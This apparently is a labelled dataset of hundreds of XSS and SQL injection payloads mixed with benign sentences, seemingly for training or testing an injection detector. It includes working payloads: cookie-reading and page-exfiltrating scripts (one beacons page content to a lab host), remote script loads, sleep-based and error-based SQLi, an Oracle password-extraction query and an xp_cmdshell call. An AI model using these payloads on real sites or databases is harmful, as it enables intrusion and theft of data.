onmouseover=""document.vulnerable=true;"">",1,XSS,6558 "-5827"" ) as lskq where 7683 = 7683 union all select 7683,7683,7683,7683,7683#",2,SQLi,15397 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ""rbqs"" = ""rbqs",2,SQLi,12169 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><article id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></article>",1,XSS,161 "<style>@keyframes x{}</style><head style=""animation-name:x"" onanimationstart=""alert(1)""></head>",1,XSS,1591 "{""id"":null,""name"":""community""}",3,normal,27406 "select * from users where id = 1 or @#"" ( = 1 union select 1,version ( ) -- 1",2,SQLi,15393 <title id=x tabindex=1 onfocusin=alert(1)></title>,1,XSS,5567 create,3,normal,23113 <figure onpointerover=alert(1)>XSS</figure>,1,XSS,7193 Select your destination.,3,normal,24834 "1"" and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ""ardk"" like ""ardk",2,SQLi,10600 "-5910%' ) ) ) union all select 5184,5184,5184,5184,5184,5184,5184,5184,5184,5184--",2,SQLi,15085 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( ""qkat"" = ""qkat",2,SQLi,13388 "<style>@keyframes x{}</style><tfoot style=""animation-name:x"" onanimationstart=""alert(1)""></tfoot>",1,XSS,1558 "<menuitem draggable=""true"" ondragstart=""alert(1)"">test</menuitem>",1,XSS,2830 "<style>@keyframes slidein {}</style><div style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></div>",1,XSS,438 ( select top 1,2,SQLi,22205 "-8812"" ) where 1646 = 1646 union all select 1646,1646,1646,1646,1646,1646--",2,SQLi,15616 "{""id"":null,""name"":""tide or""}",3,normal,27158 -1485' ) or ( 2056 = 4008 ) *4008 and ( 'vphj' = 'vphj,2,SQLi,17996 </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>,1,XSS,2782 "<figure draggable=""true"" ondragend=""alert(1)"">test</figure>",1,XSS,3703 "<kbd onpaste=""alert(1)"" contenteditable>test</kbd>",1,XSS,5688 1' ) ) as yefv where 4263 = 4263,2,SQLi,20373 "<label draggable=""true"" ondrag=""alert(1)"">test</label>",1,XSS,4729 "-5744 ) union all select 3617,3617,3617,3617,3617,3617--",2,SQLi,17646 "<acronym onbeforepaste=""alert(1)"" contenteditable>test</acronym>",1,XSS,2953 Choose fields where relevant.,3,normal,23449 "<? '=""foo""><x foo='><img src=x onerror=alert(3)//'>//[""'`-->]]>]</div>",1,XSS,2557 "-7083"" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ""ajcl"" like ""ajcl",2,SQLi,10374 Where's the library?,3,normal,23511 select * from users where id = 1 or $<\. or 1 = 1 -- 1,2,SQLi,17905 "1, ( select ( case when ( 9443 = 9443 ) then sleep ( 5 ) else 9443* ( select 9443 from information_schema.character_sets ) end ) )",2,SQLi,12761 "<element onmousedown=""alert(1)"">test</element>",1,XSS,6467 <object onpointerout=alert(1)>XSS</object>,1,XSS,7358 "1 ) where 7815 = 7815 union all select null,null,null,null,null,null,null#",2,SQLi,15741 <sVg><scRipt >alert&lpar;1&rpar; {Opera},1,XSS,7826 "1 ) ) ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( 1205 = 1205",2,SQLi,12473 The service is going to select popular and recent posts.,3,normal,25382 "1"" ) as eoer where 8667 = 8667 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) --",2,SQLi,15295 "<img onkeydown=""alert(1)"" contenteditable>test</img>",1,XSS,5187 "1"" and 2006 = 2006",2,SQLi,22062 "<script src=""/\%(jscript)s""></script>",1,XSS,8552 "<track oncut=""alert(1)"" contenteditable>test</track>",1,XSS,5244 ")) AND ELT(1337=1337,SLEEP(5)) AND (('1337'='1337",2,SQLi,18538 <strike id=x tabindex=1 onbeforedeactivate=alert(1)></strike><input autofocus>,1,XSS,2094 1' where 1770 = 1770,2,SQLi,21824 1' ) ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( 'eocx' = 'eocx,2,SQLi,10231 "1'+ ( select 'otqy' where 2754 = 2754 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) ) +'",2,SQLi,11972 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><figure id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></figure>",1,XSS,189 I want to select a gift for my cousin's birthday.,3,normal,23761 1'+ ( select zwsr where 6567 = 6567,2,SQLi,20063 1'+ ( select 'dpun' where 4760 = 4760,2,SQLi,19834 Select a program to watch on TV.,3,normal,24051 "<body onpagehide=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>",1,XSS,1383 Select the top choice.,3,normal,24273 <rtc onpointermove=alert(1)>XSS</rtc>,1,XSS,8608 select ( case when ( 1776 = 7688 ) then 1776 else 1/ ( select 0 ) end ) --,2,SQLi,15767 "1%"" ) ) ) order by 1--",2,SQLi,21452 "-2964"" ) ) order by 1--",2,SQLi,21312 "1'+ ( select 'ycvl' where 8415 = 8415 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11552 1 where 6223 = 6223 rlike sleep ( 5 ) #,2,SQLi,19583 "1 where 1886 = 1886 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,15062 This formerly led to purely political appointments; but it is usual now to select clergymen approved by public opinion.,3,normal,25306 Select knife.,3,normal,24534 "<bdo onmouseover=""alert(1)"">test</bdo>",1,XSS,8451 "1"" ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11414 "{""id"":null,""firstName"":""Jia"",""lastName"":""Huiz"",""address"":""1088 Pinehurst St"",""city"":""906"",""telephone"":""2544848420""}",3,normal,27487 "<a href=""javascript%26colon;alert(1)"">click",1,XSS,7298 ( case when 5640 = 5640 then 5640 else null end ),2,SQLi,18643 "><iframe%20src=""http://google.com""%%203E",1,XSS,8071 "1' ) where 1646 = 1646 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12959 "-9954"" ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ""bifi"" = ""bifi",2,SQLi,9983 "1"" ) as eomu where 6599 = 6599",2,SQLi,20646 Where's the holistic health center?,3,normal,23638 Select a method to relax.,3,normal,24027 <sVg oNloaD=write()>,1,XSS,9767 "<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>",1,XSS,26 "<content onkeypress=""alert(1)"" contenteditable>test</content>",1,XSS,3365 "<div draggable=""true"" contenteditable>drag me</div><legend ondrop=alert(1) contenteditable>drop here</legend>",1,XSS,1090 "1' ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( 'ylql' like 'ylql",2,SQLi,12890 "1', ( cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 7823 = 7823 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) )",2,SQLi,10910 "1"" where 7015 = 7015 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) --",2,SQLi,11614 "Discussions on set subjects were held, select passages from the classics learned by heart, while written exercises in prose and verse were founded on the best ancient models.",3,normal,26241 "-8347%' ) union all select 7643,7643,7643--",2,SQLi,19249 "1' ) ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ( 'zxhn' like 'zxhn",2,SQLi,10527 "1' ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( 'ccqs' = 'ccqs",2,SQLi,12330 1' ) as scnn where 9274 = 9274,2,SQLi,20562 "-8506' ) ) ) union all select 1950,1950,1950,1950,1950,1950--",2,SQLi,17103 "select * from users where id = 1 + $+%1 union select null,@@VERSION -- 1",2,SQLi,15930 Clinton has also paid careful attention to select the right issues.,3,normal,26277 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#",2,SQLi,11968 "<td oncut=""alert(1)"" contenteditable>test</td>",1,XSS,6339 "1 ) union all select null,null,null,null,null,null,null#",2,SQLi,17635 declare @s varchar (200) select @s = 0x73656c6 ...,2,SQLi,18407 &lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;,1,XSS,278 "1"" where 8379 = 8379 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12437 admin' or ',2,SQLi,22347 "1%"" and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,19361 "-6890"" ) ) ) union all select 1115#",2,SQLi,20045 "<abbr onbeforepaste=""alert(1)"" contenteditable>test</abbr>",1,XSS,3908 "-5672%"" or 3825 = 9675--",2,SQLi,21193 "<TABLE><TD BACKGROUND=""javascript:alert('XSS')"">",1,XSS,5847 "{""id"":null,""firstName"":""Damien"",""lastName"":""Gareth"",""address"":"" Inflight Catering Centre 55 Airport Boulevard #6"",""city"":""430"",""telephone"":""6020428847""}",3,normal,27215 1' ) as zxos where 2745 = 2745,2,SQLi,20527 "<div draggable=""true"" contenteditable>drag me</div><nav ondragover=alert(1) contenteditable>drop here</nav>",1,XSS,1139 "1' ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,19175 -6540' ) where 5019 = 5019 or ( 8459 = 8459 ) *4906--,2,SQLi,18132 "1%"" ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13348 Where's the SQL resource?,3,normal,23406 "<xss draggable=""true"" ondrag=""alert(1)"" style=display:block>test</xss>",1,XSS,2492 "1%"" or sleep ( 5 ) #",2,SQLi,21857 "1'+ ( select 'ejox' where 2719 = 2719 union all select null,null,null#",2,SQLi,16189 <image3 onpointerup=alert(1)>XSS</image3>,1,XSS,7745 select ( case when ( 7852 = 7476 ) then 7852 else 7852* ( select 7852 from mysql.db ) end ) #,2,SQLi,14506 "1%"" ) ) ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13151 <rt onblur=alert(1) tabindex=1 id=x></rt><input autofocus>,1,XSS,3937 "1%"" ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15096 <plaintext onblur=alert(1) tabindex=1 id=x></plaintext><input autofocus>,1,XSS,2386 <data onpointerenter=alert(1)>XSS</data>,1,XSS,8019 <BODY BACKGROUND=�javascript:alert(�XSS�)�>,1,XSS,7087 "-3442' in boolean mode ) union all select 6255,6255,6255,6255,6255#",2,SQLi,16523 </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>,1,XSS,1865 select ( case when ( 7978 = 6009 ) then 7978 else 1/ ( select 0 ) end ) --,2,SQLi,15712 "-4993"" union all select 6959,6959,6959--",2,SQLi,19527 "UNION ALL SELECT 1,2,3,4,5,6#",2,SQLi,20669 "<style>@keyframes slidein {}</style><nextid style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></nextid>",1,XSS,366 "<br onmouseout=""alert(1)"">test</br>",1,XSS,9097 "1 or elt ( 6272 = 6272,sleep ( 5 ) ) # klaw",2,SQLi,19227 I want to select a gift for the special occasion.,3,normal,23983 Where did you find that cozy reading nook?,3,normal,23787 1' ) ) ) rlike sleep ( 5 ) and ( ( ( 'svuu' = 'svuu,2,SQLi,18378 "-2373%"" ) or 9323 = 9323#",2,SQLi,21113 "&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\""XSS\"");&lt;/SCRIPT&gt;",1,XSS,3804 "1"" ) ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15333 or a=a--,2,SQLi,22490 <pre onblur=alert(1) tabindex=1 id=x></pre><input autofocus>,1,XSS,3538 "<area onbeforepaste=""alert(1)"" contenteditable>test</area>",1,XSS,3827 <acronym onpointermove=alert(1)>XSS</acronym>,1,XSS,6645 "Tap the ""SELECT MULTIPLE"" button with the overlapping square icon in the top-right of the screen to select multiple photos.",3,normal,25507 "1' or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and 'bwrb' like 'bwrb",2,SQLi,13015 select case when 4488 = 5522 then 1 else null end--,2,SQLi,18354 "1,iif ( 7475 = 7475,1,1/0 )",2,SQLi,20907 All clothing and accessories available at select Chanel boutiques nationwide.,3,normal,26396 "1' or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 )",2,SQLi,13551 <button onpointermove=alert(1)>XSS</button>,1,XSS,7272 Please select wisely.,3,normal,24266 <html onpointerleave=alert(1)>XSS</html>,1,XSS,7932 "1 ) ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( ( 6312 = 6312",2,SQLi,13006 <input2 onpointerdown=alert(1)>XSS</input2>,1,XSS,7169 "1%"" ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ""%"" = """,2,SQLi,12893 Where's your SQL experience?,3,normal,23389 <IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)>,1,XSS,5869 "<tt onbeforepaste=""alert(1)"" contenteditable>test</tt>",1,XSS,4763 "<div draggable=""true"" contenteditable>drag me</div><object ondragover=alert(1) contenteditable>drop here</object>",1,XSS,884 ( select ( case when ( 1421 = 1421 ) then 1 else 1421* ( select 1421 from master..sysdatabases ) end ) ),2,SQLi,13917 The process can select even a single binding phage out of ten million others.,3,normal,25391 "<style>:target {transform: rotate(180deg);}</style><section id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></section>",1,XSS,559 <multicol id=x tabindex=1 ondeactivate=alert(1)></multicol><input id=y autofocus>,1,XSS,1962 "1%"" ) ) ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13355 "<style>:target {color:red;}</style><span id=x style=""transition:color 1s"" ontransitionend=alert(1)></span>",1,XSS,1209 <tbody onpointermove=alert(1)>XSS</tbody>,1,XSS,7687 "1 where 2363 = 2363 union all select null,null,null,null,null--",2,SQLi,16883 Join the language class for a new skill.,3,normal,22964 "1%"" ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ""%"" = """,2,SQLi,12045 "1"" ) ) as hiuf where 3277 = 3277 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10509 1' where 5455 = 5455 and sleep ( 5 ) --,2,SQLi,19619 "<menuitem oncopy=""alert(1)"" contenteditable>test</menuitem>",1,XSS,3632 "<style>@keyframes x{}</style><dt style=""animation-name:x"" onanimationstart=""alert(1)""></dt>",1,XSS,1710 "<style>:target {color: red;}</style><dt id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></dt>",1,XSS,1142 ) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,19570 "<caption onmouseenter=""alert(1)"">test</caption>",1,XSS,6209 "Wet n Wild MegaGlo Highlighting Powder, $3.99, available at select drugstores.",3,normal,25171 select sleep ( 5 ) and ( ( '%' = ',2,SQLi,20138 Select the perfect outfit for an event.,3,normal,24144 <!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->,1,XSS,2662 "1"" ) as eefe where 5290 = 5290 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",2,SQLi,14876 <script>Object.prototype.sourceURL = '\u2028\u2029alert(1)'</script><script>_.template('test')</script>,1,XSS,1309 "1 ) ) ) union all select null,null,null,null--",2,SQLi,18975 "-2625"" ) ) as qfuo where 1980 = 1980 union all select 1980,1980,1980--",2,SQLi,16236 "1"" ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( ""ozvp"" = ""ozvp",2,SQLi,12476 "1"" waitfor delay '0:0:5' and ""syhx"" = ""syhx",2,SQLi,19242 <em id=x tabindex=1 onfocusin=alert(1)></em>,1,XSS,6908 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i",2,SQLi,11951 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual#",2,SQLi,14096 <svg><sup onload=alert(1)></sup>,1,XSS,9432 "<set attributeName=""xlink:href"" begin=""accessKey(b)"" to=""//example.com/?b"" />",1,XSS,2153 )))))) waitfor delay '0:0:20' /*,2,SQLi,20243 "{""id"":null,""name"":""divide""}",3,normal,27211 Modify the text.,3,normal,22842 Select your board.,3,normal,24872 "1 ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( 4959 = 4959",2,SQLi,13307 <keygen id=x tabindex=1 onactivate=alert(1)></keygen>,1,XSS,5006 Update style.,3,normal,23052 "-1162"" ) ) as mhmh where 8710 = 8710 or make_set ( 4822 = 7598,7598 ) --",2,SQLi,16020 "<a style=""behavior:url(#default#AnchorClick);"" folder=""javascript:javascript:alert(1)"">XXX</a>",1,XSS,1629 "1 ) union all select null,null,null--",2,SQLi,19864 ); alert('xss'); var x=',1,XSS,9717 -4775' ) or 3038 = 3038,2,SQLi,21346 "<style>@keyframes slidein {}</style><header style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></header>",1,XSS,360 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><figcaption id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></figcaption>",1,XSS,140 <pre onpointerleave=alert(1)>XSS</pre>,1,XSS,8494 "-1598"" ) ) or elt ( 5329 = 9628,9628 ) and ( ( ""hyxq"" like ""hyxq",2,SQLi,16790 "1' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and 'bpbe' like 'bpbe",2,SQLi,11205 "<style>@keyframes slidein {}</style><isindex style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></isindex>",1,XSS,342 <!--[if<img src=x onerror=javascript:alert(1)//]> -->,1,XSS,4859 t'exec master..xp_cmdshell 'nslookup www.google.com'--,2,SQLi,17847 style=xss:expression(alert(1)),1,XSS,9572 "1 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )",2,SQLi,13889 1' ) ) ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,17354 1 ) where 6039 = 6039 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,10606 "<SCRIPT a=>SRC=""httx://xss.rocks/xss.js""></SCRIPT>",1,XSS,5500 1' ) ) and 4595 = 4595#,2,SQLi,21331 <BODY ONLOAD=alert('hellox worldss')>,1,XSS,8559 "1'|| ( select 'fpfl' from dual where 1434 = 1434 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) ) ||'",2,SQLi,10937 <noframes id=x tabindex=1 onbeforedeactivate=alert(1)></noframes><input autofocus>,1,XSS,1934 <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->,1,XSS,2354 "1 ) ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,15872 "<command onbeforecut=""alert(1)"" contenteditable>test</command>",1,XSS,3238 "1"" ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( ""umne"" like ""umne",2,SQLi,12379 <i onpointerup=alert(1)>XSS</i>,1,XSS,9496 Select your vow.,3,normal,24957 "<IMG SRC=x oninput=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3809 <SCRIPT SRC=https://cdn.jsdelivr.net/gh/Moksh45/host-xss.rocks/index.js></SCRIPT>,1,XSS,1938 <svg><set onbegin=alert(1) attributename=x dur=1s>,1,XSS,5621 "1' ) as mmhe where 2142 = 2142 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) --",2,SQLi,14997 1' ) as uwmy where 6980 = 6980,2,SQLi,20564 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) )",2,SQLi,18824 Select the ideal setting for the occasion.,3,normal,24029 <rtc id=x tabindex=1 onactivate=alert(1)></rtc>,1,XSS,6141 "<style>:target {color: red;}</style><command id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></command>",1,XSS,787 log,3,normal,23215 "<slot onmousedown=""alert(1)"">test</slot>",1,XSS,8039 "<image onclick=""alert(1)"">test</image>",1,XSS,8318 "{""id"":null,""name"":""harbor sink""}",3,normal,26895 WHERE 1=1 AND 1=0,2,SQLi,22083 "1 ) ) union all select null,null,null,null,null--",2,SQLi,18580 &lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;,1,XSS,2171 Join dinner.,3,normal,23054 1 ) ) as ehlg where 6340 = 6340,2,SQLi,20418 1 ) and ( 2342 = 3620 ) *3620,2,SQLi,20751 "-1401"" ) ) union all select 3480,3480,3480,3480,3480,3480--",2,SQLi,17318 Select a scenic view.,3,normal,22694 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3-- uugg",2,SQLi,14162 1'|| ( select 'ezse' from dual where 3821 = 3821,2,SQLi,18717 "-8557 or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11850 "select * from users where id = 1. union select null,version ( ) -- 1",2,SQLi,16370 "<listing onmouseout=""alert(1)"">test</listing>",1,XSS,6594 "<link onkeypress=""alert(1)"" contenteditable>test</link>",1,XSS,4460 "1 where 7240 = 7240 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14349 "<IMG SRC=""javascript:javascript:alert(1)""",1,XSS,7600 <a onpointermove=alert(1)>XSS</a>,1,XSS,9373 "<a href=""jav&#65ascript:javascript:alert(1)"">test1</a>",1,XSS,4654 Where's the missing remote control?,3,normal,22644 "<style>@keyframes slidein {}</style><dt style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></dt>",1,XSS,444 "1%' ) ) ) union all select null,null#",2,SQLi,19823 */alert(1)</script><script>/*,1,XSS,9594 "Select and Click on ""Delete"" — you've already cleared him.",3,normal,25651 Select the right size for the clothes.,3,normal,24044 "</style>//[""'`-->]]>]</div>",1,XSS,9652 Select the top talent.,3,normal,24320 <samp id=x tabindex=1 onactivate=alert(1)></samp>,1,XSS,5746 "1 ) ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,15771 """+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*",2,SQLi,17462 "1' in boolean mode ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) #",2,SQLi,15869 "-9762 ) or elt ( 5773 = 8986,8986 )",2,SQLi,20107 "1"" ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ""hbgv"" = ""hbgv",2,SQLi,11975 &lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;,1,XSS,931 David Seaburg was a buyer of the Energy Select Sector SPDR.,3,normal,26251 Select the best candidate from the list.,3,normal,22894 "</ foo=""><script>alert(1)</script>"">",1,XSS,8770 -8999' ) ) ) or 6872 = 6872 and ( ( ( 'jare' = 'jare,2,SQLi,18237 "1 ) as svkf where 6503 = 6503 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11144 "-7126' ) ) as fzpp where 8078 = 8078 union all select 8078,8078,8078,8078,8078,8078,8078#",2,SQLi,14754 "1' ) where 3255 = 3255 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11762 "1'|| ( select 'tmsj' where 2971 = 2971 union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,13814 "From there, Sweetgreen delivers to that location at a select time.",3,normal,26159 1 where 1092 = 1092,2,SQLi,21961 Select switch.,3,normal,24761 "<a href=""\xE1\xA0\x8Ejavascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2013 "-2207%' ) ) union all select 3339,3339,3339,3339,3339,3339#",2,SQLi,17321 "<script>alert(""hellox worldss"");</script>",1,XSS,7614 1'|| ( select 'cfff' where 4994 = 4994,2,SQLi,19681 1' and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and 'lqsa' like 'lqsa,2,SQLi,16052 Select a movie for a movie marathon.,3,normal,24107 "{""id"":null,""firstName"":""Damien"",""lastName"":""Gareth"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27334 1 ) where 8320 = 8320 waitfor delay '0:0:5'--,2,SQLi,19014 "1"" ) ) and 4595 = 4595#",2,SQLi,21343 "<keygen 